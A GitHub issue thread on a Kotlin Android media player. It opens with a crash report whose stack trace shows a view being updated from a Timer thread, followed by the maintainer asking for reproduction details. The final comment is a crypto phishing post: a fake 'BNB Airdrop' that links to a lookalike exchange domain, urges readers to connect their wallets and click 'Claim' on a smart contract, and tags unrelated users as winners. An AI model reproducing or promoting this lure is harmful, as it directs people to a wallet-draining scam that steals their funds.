### ISSUE TITLE
This app keeps stopping

### ISSUE THREAD

**Issue by agamkoradiya** [cerver1/Kotlin-Media-Player#3]
2020-09-20 17:09:22.971 11408-11449/com.fair.kotlin_media_player E/AndroidRuntime: FATAL EXCEPTION: Timer-0
    Process: com.fair.kotlin_media_player, PID: 11408
    android.view.ViewRootImpl$CalledFromWrongThreadException: Only the original thread that created a view hierarchy can touch its views.
        at android.view.ViewRootImpl.checkThread(ViewRootImpl.java:7534)
        at android.view.ViewRootImpl.invalidateChildInParent(ViewRootImpl.java:1235)
        at android.view.ViewGroup.invalidateChild(ViewGroup.java:5381)
        at android.view.View.invalidateInternal(View.java:13751)
        at android.view.View.invalidate(View.java:13712)
        at android.view.View.invalidate(View.java:13696)
        at com.visualizer.amplitude.AudioRecordView.update(AudioRecordView.kt:80)
        at com.fair.kotlin_media_player.AudioRecorderFragment$startRecording$1.run(AudioRecorderFragment.kt:98)
        at java.util.TimerThread.mainLoop(Timer.java:555)
        at java.util.TimerThread.run(Timer.java:505)

**Comment by cerver1** [comment]
Thank you for catching this issue

Please detail when it stops for you. 
Which screen it stops on, what did you do before it stopped etc.

**Comment by agamkoradiya** [comment]
> 
> 
> Thank you for catching this issue
> 
> Please detail when it stops for you.
> Which screen it stops on, what did you do before it stopped etc.

I opened it first time then click on record button after i allowed all permission then i re click on button and directly i got above error...

**Comment by cerver1** [comment]
Interestingly I replicated those steps and had no issues.

Would you please be able to share the OS version, Android version, and Model of your device?

Thank you in advance

**Comment by mrpanday93** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @NotStaplesCorporate, @jbripley, @anjingxz, @andywang0607, @lo, @jcwayne, @bradjonesca
